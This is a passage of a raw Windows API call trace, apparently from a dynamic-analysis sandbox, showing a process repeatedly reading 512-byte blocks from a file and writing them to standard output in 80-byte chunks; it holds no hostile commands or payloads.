lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af064*, lpNumberOfBytesWritten=0x1ae068*=0x20, lpOverlapped=0x0) returned 1 [0152.518] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.518] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae054 | out: lpNewFilePointer=0x0) returned 1 [0152.518] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.518] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.518] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.518] GetFileType (hFile=0x50) returned 0x1 [0152.519] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.519] GetFileType (hFile=0x50) returned 0x1 [0152.519] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.519] WriteFile (in: hFile=0x50, lpBuffer=0x1aee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.519] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.519] GetFileType (hFile=0x50) returned 0x1 [0152.519] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.519] WriteFile (in: hFile=0x50, lpBuffer=0x1aeed4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aeed4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.519] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.519] GetFileType (hFile=0x50) returned 0x1 [0152.519] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.519] WriteFile (in: hFile=0x50, lpBuffer=0x1aef24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef24*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.519] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.519] GetFileType (hFile=0x50) returned 0x1 [0152.519] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.519] WriteFile (in: hFile=0x50, lpBuffer=0x1aef74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef74*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.519] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.519] GetFileType (hFile=0x50) returned 0x1 [0152.519] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.519] WriteFile (in: hFile=0x50, lpBuffer=0x1aefc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aefc4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.519] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.519] GetFileType (hFile=0x50) returned 0x1 [0152.519] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.519] WriteFile (in: hFile=0x50, lpBuffer=0x1af014*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af014*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.520] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.520] GetFileType (hFile=0x50) returned 0x1 [0152.520] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.520] WriteFile (in: hFile=0x50, lpBuffer=0x1af064*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af064*, lpNumberOfBytesWritten=0x1ae068*=0x20, lpOverlapped=0x0) returned 1 [0152.520] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.520] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae054 | out: lpNewFilePointer=0x0) returned 1 [0152.520] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.520] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.520] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.520] GetFileType (hFile=0x50) returned 0x1 [0152.520] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.520] GetFileType (hFile=0x50) returned 0x1 [0152.520] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.520] WriteFile (in: hFile=0x50, lpBuffer=0x1aee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.520] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.520] GetFileType (hFile=0x50) returned 0x1 [0152.520] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.520] WriteFile (in: hFile=0x50, lpBuffer=0x1aeed4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aeed4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.521] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.521] GetFileType (hFile=0x50) returned 0x1 [0152.521] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.521] WriteFile (in: hFile=0x50, lpBuffer=0x1aef24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef24*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.521] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.521] GetFileType (hFile=0x50) returned 0x1 [0152.521] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.521] WriteFile (in: hFile=0x50, lpBuffer=0x1aef74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef74*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.521] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.521] GetFileType (hFile=0x50) returned 0x1 [0152.521] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.521] WriteFile (in: hFile=0x50, lpBuffer=0x1aefc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aefc4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.521] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.521] GetFileType (hFile=0x50) returned 0x1 [0152.521] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.521] WriteFile (in: hFile=0x50, lpBuffer=0x1af014*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af014*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.521] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.521] GetFileType (hFile=0x50) returned 0x1 [0152.521] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.521] WriteFile (in: hFile=0x50, lpBuffer=0x1af064*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af064*, lpNumberOfBytesWritten=0x1ae068*=0x20, lpOverlapped=0x0) returned 1 [0152.521] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.521] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae054 | out: lpNewFilePointer=0x0) returned 1 [0152.522] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.522] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.522] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.522] GetFileType (hFile=0x50) returned 0x1 [0152.522] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.522] GetFileType (hFile=0x50) returned 0x1 [0152.522] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.522] WriteFile (in: hFile=0x50, lpBuffer=0x1aee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.522] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.522] GetFileType (hFile=0x50) returned 0x1 [0152.522] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.522] WriteFile (in: hFile=0x50, lpBuffer=0x1aeed4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aeed4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.522] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.522] GetFileType (hFile=0x50) returned 0x1 [0152.522] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.522] WriteFile (in: hFile=0x50, lpBuffer=0x1aef24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef24*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.522] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.522] GetFileType (hFile=0x50) returned 0x1 [0152.522] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.522] WriteFile (in: hFile=0x50, lpBuffer=0x1aef74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef74*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.522] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.522] GetFileType (hFile=0x50) returned 0x1 [0152.522] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.522] WriteFile (in: hFile=0x50, lpBuffer=0x1aefc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aefc4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.523] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.523] GetFileType (hFile=0x50) returned 0x1 [0152.523] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.523] WriteFile (in: hFile=0x50, lpBuffer=0x1af014*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af014*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.523] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.523] GetFileType (hFile=0x50) returned 0x1 [0152.523] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.523] WriteFile (in: hFile=0x50, lpBuffer=0x1af064*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af064*, lpNumberOfBytesWritten=0x1ae068*=0x20, lpOverlapped=0x0) returned 1 [0152.523] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.523] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae054 | out: lpNewFilePointer=0x0) returned 1 [0152.523] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.523] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.523] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.523] GetFileType (hFile=0x50) returned 0x1 [0152.523] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.523] GetFileType (hFile=0x50) returned 0x1 [0152.523] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.523] WriteFile (in: hFile=0x50, lpBuffer=0x1aee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.523] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.523] GetFileType (hFile=0x50) returned 0x1 [0152.523] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.523] WriteFile (in: hFile=0x50, lpBuffer=0x1aeed4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aeed4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.523] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.523] GetFileType (hFile=0x50) returned 0x1 [0152.524] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.524] WriteFile (in: hFile=0x50, lpBuffer=0x1aef24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef24*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.524] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.524] GetFileType (hFile=0x50) returned 0x1 [0152.524] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.524] WriteFile (in: hFile=0x50, lpBuffer=0x1aef74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef74*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.524] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.524] GetFileType (hFile=0x50) returned 0x1 [0152.524] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.524] WriteFile (in: hFile=0x50, lpBuffer=0x1aefc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aefc4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.524] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.524] GetFileType (hFile=0x50) returned 0x1 [0152.524] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.524] WriteFile (in: hFile=0x50, lpBuffer=0x1af014*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af014*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.524] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.524] GetFileType (hFile=0x50) returned 0x1 [0152.524] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.524] WriteFile (in: hFile=0x50, lpBuffer=0x1af064*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af064*, lpNumberOfBytesWritten=0x1ae068*=0x20, lpOverlapped=0x0) returned 1 [0152.524] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.524] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae054 | out: lpNewFilePointer=0x0) returned 1 [0152.524] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.524] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.525] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.525] GetFileType (hFile=0x50) returned 0x1 [0152.525] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.525] GetFileType (hFile=0x50) returned 0x1 [0152.525] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.525] WriteFile (in: hFile=0x50, lpBuffer=0x1aee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.525] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.525] GetFileType (hFile=0x50) returned 0x1 [0152.525] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.525] WriteFile (in: hFile=0x50, lpBuffer=0x1aeed4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aeed4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.525] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.525] GetFileType (hFile=0x50) returned 0x1 [0152.525] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.525] WriteFile (in: hFile=0x50, lpBuffer=0x1aef24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef24*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.525] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.525] GetFileType (hFile=0x50) returned 0x1 [0152.525] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.525] WriteFile (in: hFile=0x50, lpBuffer=0x1aef74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef74*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.525] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.525] GetFileType (hFile=0x50) returned 0x1 [0152.525] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.525] WriteFile (in: hFile=0x50, lpBuffer=0x1aefc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aefc4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.525] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.525] GetFileType (hFile=0x50) returned 0x1 [0152.526] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.526] WriteFile (in: hFile=0x50, lpBuffer=0x1af014*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af014*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.526] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.526] GetFileType (hFile=0x50) returned 0x1 [0152.526] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.526] WriteFile (in: hFile=0x50, lpBuffer=0x1af064*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af064*, lpNumberOfBytesWritten=0x1ae068*=0x20, lpOverlapped=0x0) returned 1 [0152.526] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.526] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae054 | out: lpNewFilePointer=0x0) returned 1 [0152.526] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.526] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.526] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.526] GetFileType (hFile=0x50) returned 0x1 [0152.526] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.526] GetFileType (hFile=0x50) returned 0x1 [0152.526] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.526] WriteFile (in: hFile=0x50, lpBuffer=0x1aee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.526] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.526] GetFileType (hFile=0x50) returned 0x1 [0152.526] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.526] WriteFile (in: hFile=0x50, lpBuffer=0x1aeed4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aeed4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.526] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.526] GetFileType (hFile=0x50) returned 0x1 [0152.526] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.526] WriteFile (in: hFile=0x50, lpBuffer=0x1aef24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef24*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.527] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.527] GetFileType (hFile=0x50) returned 0x1 [0152.527] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.527] WriteFile (in: hFile=0x50, lpBuffer=0x1aef74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef74*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.527] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.527] GetFileType (hFile=0x50) returned 0x1 [0152.527] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.527] WriteFile (in: hFile=0x50, lpBuffer=0x1aefc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aefc4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.527] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.527] GetFileType (hFile=0x50) returned 0x1 [0152.527] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.527] WriteFile (in: hFile=0x50, lpBuffer=0x1af014*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af014*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.527] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.527] GetFileType (hFile=0x50) returned 0x1 [0152.527] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.527] WriteFile (in: hFile=0x50, lpBuffer=0x1af064*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af064*, lpNumberOfBytesWritten=0x1ae068*=0x20, lpOverlapped=0x0) returned 1 [0152.527] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.527] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae054 | out: lpNewFilePointer=0x0) returned 1 [0152.527] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.527] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.527] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.527] GetFileType (hFile=0x50) returned 0x1 [0152.527] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.527] GetFileType (hFile=0x50) returned 0x1 [0152.528] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.528] WriteFile (in: hFile=0x50, lpBuffer=0x1aee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.528] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.528] GetFileType (hFile=0x50) returned 0x1 [0152.528] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.528] WriteFile (in: hFile=0x50, lpBuffer=0x1aeed4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aeed4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.528] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.528] GetFileType (hFile=0x50) returned 0x1 [0152.528] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.528] WriteFile (in: hFile=0x50, lpBuffer=0x1aef24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef24*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.528] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.528] GetFileType (hFile=0x50) returned 0x1 [0152.528] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.528] WriteFile (in: hFile=0x50, lpBuffer=0x1aef74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef74*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.528] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.528] GetFileType (hFile=0x50) returned 0x1 [0152.528] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.528] WriteFile (in: hFile=0x50, lpBuffer=0x1aefc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aefc4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.528] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.528] GetFileType (hFile=0x50) returned 0x1 [0152.528] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.528] WriteFile (in: hFile=0x50, lpBuffer=0x1af014*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af014*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.528] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.529] GetFileType (hFile=0x50) returned 0x1 [0152.529] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.529] WriteFile (in: hFile=0x50, lpBuffer=0x1af064*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af064*, lpNumberOfBytesWritten=0x1ae068*=0x20, lpOverlapped=0x0) returned 1 [0152.529] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.529] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae054 | out: lpNewFilePointer=0x0) returned 1 [0152.529] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.529] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.529] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.529] GetFileType (hFile=0x50) returned 0x1 [0152.529] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.529] GetFileType (hFile=0x50) returned 0x1 [0152.529] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.529] WriteFile (in: hFile=0x50, lpBuffer=0x1aee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.529] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.529] GetFileType (hFile=0x50) returned 0x1 [0152.529] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.529] WriteFile (in: hFile=0x50, lpBuffer=0x1aeed4*, nNumberOfBytesToWrite=0x50, 